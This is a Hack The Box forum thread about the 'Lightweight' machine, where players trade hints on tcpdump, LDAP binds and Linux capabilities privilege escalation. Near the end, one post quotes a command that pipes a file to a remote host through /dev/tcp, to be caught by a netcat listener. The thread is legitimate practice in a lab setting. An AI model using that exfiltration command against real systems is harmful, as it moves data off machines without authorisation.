Lightweight

Can somebody help with the initial user, I am getting nothing interesting in the tc****p output. Stuck on it from 3 days. Please DM.
Thanks

can someone PM on what to do with the trigger and listen part? I am a bit stuck, I have found there is a certain page that takes longer to respond and I am connected with SSH but not sure how to listen and how to listen

Edit: Got user then root shell. PM for any hints (learned a lot from this one and it was good fun). Also thanks to others who helped me out.

Good luck and have fun

hey guys i found ld******2 hash password, but iam really stuck now…
can you pm me for hint?

Got user, and root shell!
An awesome machine to learn a lot about linux capabilities and networking!
Also if you google good enough there are some awesome tutorials about how to do priv esc with that.

Hi guys and girls!
this is my first try on a HTB-box and I really can’t get very far. All I have is a the ssh connectioj to my user account and a few dump-files from wireshark, where i cannot find any useful info yet… getting a little frustrated.

The hints with “capabilities” etc. didn’t helkp me much.
I would very much appreciate any help from you people. Please PM me, if you would like to help a noob out.

Thanks in advance :slight_smile:

Anyone kind enough to PM me with hint on path to User? Hours of getting nowhere, except a priv esc to Root theory. Thanks in advance :slight_smile:

I got some sdbm things, I don’t know how to use them, hel!

Anyone can give me a hint towards the user? Got already some dump and some data, dont know what to do with it. Thanks!

I found two binaries in the dir. And found there is something related to capability
And followed that medium article
But still I am getting permission denied in reading files, even after applying the steps of that article properly.
Any help? Please DM
Thanks

Can anyone help me with the user stage? Send me a pm :slight_smile:

Stuck at the root stage.
Found user.txt.
Found files in /home/ldapuser1 but don’t know how to leverage them to gain root.
Tried to search for certificates and keys to decrypt trafic in pcap but no luck.
Any help would be appreciated.

Anyone available to PM me on the first user?

I have low privilege shell(using my ip) and two ldap hashes. Cracking it isn’t working. What am I missing? Can someone give a nudge?
EDIT:Got something from tcp****, but unable to modify l*** using this.

Ok, this was a strange box. I owned it in 2.5 hours but started to read hints in forum too early! There is more than enough written in this thread. Do not read it if you want to have more fun. This tips will be enough:

User: Tcpdump Examples - 22 Tactical Commands | HackerTarget.com & remember that you can switch users & The LDAP Bind Operation – LDAP.com
Root: Inheritance

As usual PM me if help needed :slight_smile:

Just root’ed - really great box, learned a lot here!
PM me if you need any help.

Nice Box. Learned new stuff. Good stuff.

currently i only got the nmap creds(lduser1&lduser2 with both the {crypts} + ssh into the box.

and I’m trying to find a way to get into the user without cracking the hashes (as i’ve seen people suggest) however I cant seem to get any progress…

Anyone got advice on how to proceed ? ( or what to listen on in the ssh-shell?)

Man i am just lost on this one. Can’t figure out what is needed to trigger the ldap bind request i am trying to capture. If anyone can shoot me a PM on the initial user part, it would be much appreciated.

Type your comment> @bu77er0verfl0w said:

Got User, working on root, I’ve done the whole cap privesc on a different box, cant remember which one atm. So I should pop this bad boy before I head to bed tonight. But before I finish and write my review I want to share a quick tip for anyone doing this box who is having trouble transfering files

cat FILE >& /dev/tcp/YOUR-IP/PORT

should do the trick, just dont forget to setup a netcat listener on your kali box that pipes out to a file.

Thanks for the tip! I went through the process of base64 encoding it and which was a pain.